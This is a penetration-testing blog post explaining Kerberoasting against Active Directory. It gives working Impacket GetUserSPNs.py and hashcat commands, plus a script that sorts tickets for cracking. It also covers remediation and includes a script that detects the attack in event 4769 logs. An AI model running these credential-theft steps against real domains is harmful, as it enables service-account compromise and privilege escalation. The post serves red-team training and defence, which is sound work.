
Back to Basics: Kerberoasting

October 26, 2022 By RSM Author

Welcome back to our “Back to Basics” series, where we provide you with an overview of the bread and butter pentesting techniques that we regularly see compromise networks. In this week’s installment, we’re looking at Kerberoasting.

Kerberoasting is a technique for obtaining offline-crackable credential material for Active Directory service accounts through the Kerberos authentication protocol. Kerberos lets users and services verify each other's identity: a client presents its ticket-granting ticket to the domain controller (the KDC) and receives a service ticket for the service it wants to use.

Any authenticated domain user can request a service ticket for any account that has a service principal name (SPN) registered, because the KDC does not check whether the requester is actually authorized to use that service. Part of each ticket is encrypted with the service account's long-term key. With RC4 (encryption type 23) that key is the account's NT hash; with AES (types 17 and 18) it is derived from the password and a salt built from the realm and account name. Either way, an attacker can take the ticket offline and try candidate passwords until one decrypts it. If the service account password is weak, the attacker will likely recover it. Service-ticket requests are routine traffic, so these requests blend in unless the domain controllers' Kerberos audit logs (event ID 4769) are being watched for unusual encryption types or request volumes.

Kerberoasting is a valuable attack vector for testers because administrators often neglect to remove local administrator, or even domain administrator, rights from the service accounts that carry SPNs. If you can compromise one of these service accounts, you will likely gain administrative access.

How to Perform Kerberoasting

Once you have gained access to a low-privileged domain account, enumerate the accounts configured with SPNs and request service tickets for them using GetUserSPNs.py from the Impacket suite (without -request it only lists the accounts; -request fetches the tickets, and -outputfile writes them in the format hashcat expects):

GetUserSPNs.py example.com/username:password -request -dc-ip <target dc ip> -outputfile kerberoasting.txt

If you see this error on Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

it means your host's clock differs from the domain controller's by more than the permitted skew (five minutes by default); synchronize the host with the DC:

ntpdate <IP of target DC>

Crack the tickets with hashcat. Mode 13100 is for RC4 tickets (lines beginning with $krb5tgs$23$); tickets encrypted with AES keys begin with $krb5tgs$17$ or $krb5tgs$18$ and need modes 19600 and 19700 respectively:

# all tickets must be on their own line

hashcat -m 13100 kerberoasting.txt rockyou2021.txt -r rules/InsidePro-HashManager.rule -O --force -w 3

(On Windows the rule path is rules\InsidePro-HashManager.rule. -O selects the optimized kernels, which cap candidate password length; drop it if you suspect long passwords.)
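The three steps above (request tickets, make sure each ticket sits on one line, pick the hashcat mode) are easy to get wrong when a file mixes RC4 and AES tickets or a terminal has wrapped long lines. The following script is an added example, not code from the original post or from Impacket: it reads the file written by GetUserSPNs.py -outputfile, re-joins wrapped tickets, sorts them by encryption type and prints one hashcat command per mode. The ticket layouts it parses are the ones Impacket emits; the sample tickets and their hex fields are constructed (and truncated) for illustration.

```python
"""Sort Kerberoast tickets into hashcat jobs by Kerberos encryption type.

Added example, not from the original post or from Impacket. Reads the file
written by GetUserSPNs.py -outputfile, re-joins tickets that a terminal
wrapped across lines, and picks the hashcat mode for each ticket's etype.
"""
import re
import sys
from collections import defaultdict

# hashcat mode per Kerberos encryption type for TGS-REP (Kerberoast) tickets
HASHCAT_MODES = {23: 13100,   # RC4-HMAC: key is the NT hash
                 17: 19600,   # AES128-CTS-HMAC-SHA1-96
                 18: 19700}   # AES256-CTS-HMAC-SHA1-96

# Impacket writes two layouts depending on etype:
#   $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   $krb5tgs$18$user$REALM$*spn*$checksum$edata   (same shape for 17)
TICKET_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$]+)\$(?P<realm>[^$]+)\$"
    r"\*?(?P<spn>[^$*]+)\*\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample input: hex fields are dummy and far shorter than real
# tickets; the second ticket is deliberately wrapped across two lines and the
# last one has an etype hashcat cannot crack.
SAMPLE = """\
$krb5tgs$23$*svc_sql$EXAMPLE.COM$MSSQLSvc/db01.example.com:1433*$0123456789abcdef0123456789abcdef$deadbeefcafef00d
$krb5tgs$18$svc_http$EXAMPLE.COM$*HTTP/web01.example.com*$0123456789abcdef01234567
89abcdef$c0ffee00c0ffee00
$krb5tgs$17$svc_backup$EXAMPLE.COM$*backup/bk01.example.com*$abcdef0123456789abcdef01$00112233445566778899aabb
$krb5tgs$99$*svc_odd$EXAMPLE.COM$odd/host*$00$00
"""


def normalize_lines(text):
    """Return one complete ticket per list element, re-joining wrapped lines."""
    tickets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("$krb5tgs$"):
            tickets.append(line)
        elif tickets:
            tickets[-1] += line          # continuation of the previous ticket
        else:
            raise ValueError("file does not start with a $krb5tgs$ ticket")
    return tickets


def parse_tickets(text):
    """Parse every ticket into its fields; etype becomes an int."""
    parsed = []
    for line in normalize_lines(text):
        m = TICKET_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised ticket line: {line[:40]}...")
        fields = m.groupdict()
        fields["etype"] = int(fields["etype"])
        fields["raw"] = line
        parsed.append(fields)
    return parsed


def group_by_mode(tickets):
    """Map hashcat mode -> raw ticket lines; report tickets hashcat can't take."""
    groups = defaultdict(list)
    unsupported = []
    for t in tickets:
        mode = HASHCAT_MODES.get(t["etype"])
        if mode is None:
            unsupported.append((t["user"], t["etype"]))
        else:
            groups[mode].append(t["raw"])
    return dict(groups), unsupported


def hashcat_commands(groups, wordlist="rockyou2021.txt",
                     rules="rules/InsidePro-HashManager.rule"):
    """One hashcat invocation per mode, mirroring the command in the post.
    -O caps candidate length; drop it when hunting long passwords."""
    return [f"hashcat -m {mode} kerberoasting.{mode}.txt {wordlist} "
            f"-r {rules} -O --force -w 3" for mode in sorted(groups)]


if __name__ == "__main__":
    # With a path argument, process that file; otherwise run on the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    groups, unsupported = group_by_mode(parse_tickets(text))
    for mode, lines in groups.items():
        with open(f"kerberoasting.{mode}.txt", "w") as out:
            out.write("\n".join(lines) + "\n")
    for user, etype in unsupported:
        print(f"skipping {user}: no hashcat mode for etype {etype}")
    print("\n".join(hashcat_commands(groups)))
```

Run it as python3 sort_tickets.py kerberoasting.txt; it writes one kerberoasting.<mode>.txt per encryption type and prints the matching hashcat line for each. Start with the 13100 file: RC4 tickets crack several times faster than AES ones, so a weak password will usually fall there first.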

Also see our past article, Lateral Movement with Low Privilege Shell for Red Teams.

How to Remediate

We recommend removing SPNs from all domain administrator accounts and running each service under a dedicated non-human account that has a long, complex password and only the privileges the service needs. Where the service supports it, a group managed service account (gMSA) removes the weak-password problem altogether, because its password is long, random and rotated automatically. Restricting service accounts to AES (via msDS-SupportedEncryptionTypes) also takes away the RC4 ticket, which is the fastest one to crack.
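The defensive side of the "without detection" point above: domain controllers log every service-ticket request as event ID 4769 (when the Audit Kerberos Service Ticket Operations subcategory is enabled), and Kerberoasting leaves a characteristic shape there: RC4 (TicketEncryptionType 0x17) tickets for user accounts, many distinct SPNs from one requester in a short time. The following is an added example, not code or guidance from the original post; the event lines are a constructed key=value rendering of the 4769 fields a SIEM would forward, and the three-service threshold is an assumption to tune for your environment.

```python
"""Flag Kerberoasting patterns in Windows event ID 4769 (TGS request) records.

Added example, not from the original post. Input is a constructed key=value
rendering of the 4769 fields a SIEM would forward; adapt parse_event() to
your own log shape.
"""
from collections import defaultdict

RC4_HMAC = "0x17"       # TicketEncryptionType for RC4; AES128/256 are 0x11/0x12
SUCCESS = "0x0"         # Status 0x0 means the ticket was issued

# Constructed sample: jdoe pulls RC4 tickets for three user-backed SPNs from
# one workstation; the rest is routine computer-account, AES and krbtgt traffic
# plus one legacy client that legitimately still uses RC4 for a single service.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5 Status=0x0
EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5 Status=0x0
EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5 Status=0x0
EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.5 Status=0x0
EventID=4769 TargetUserName=asmith@EXAMPLE.COM ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.9 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.COM ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.7 Status=0x0
EventID=4769 TargetUserName=legacy@EXAMPLE.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.8 Status=0x0
"""


def parse_event(line):
    """Split 'key=value key=value ...' into a dict (values contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())


def is_roast_candidate(ev):
    """An issued RC4 service ticket for a user account.

    Computer accounts (ServiceName ending in $) and krbtgt are excluded: those
    tickets come from normal logons and TGT renewals, not from Kerberoasting.
    """
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("Status") == SUCCESS
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_roasters(lines, min_services=3):
    """Requesters that pulled RC4 tickets for >= min_services distinct user SPNs.

    Returns {(TargetUserName, IpAddress): [service names]}. The threshold keeps
    a single legacy RC4 client out of the alert; a real tool run hits many SPNs.
    """
    per_requester = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            per_requester[key].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in per_requester.items()
            if len(v) >= min_services}


if __name__ == "__main__":
    for (user, ip), services in find_roasters(SAMPLE_4769.splitlines()).items():
        print(f"possible Kerberoasting by {user} from {ip}: {', '.join(services)}")
```

Tools commonly ask for RC4 because it cracks fastest, which is what makes 0x17 such a strong signal; once accounts are restricted to AES the encryption-type test stops firing and the volume rule (one requester, many user SPNs) is what remains, so keep both. Real 4769 volume is high, so run this over a sliding window per requester rather than over a whole day.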

This article was written by Kristen Gecewich, with a special thanks to Hunter Ezzell for providing images and technical expertise. 
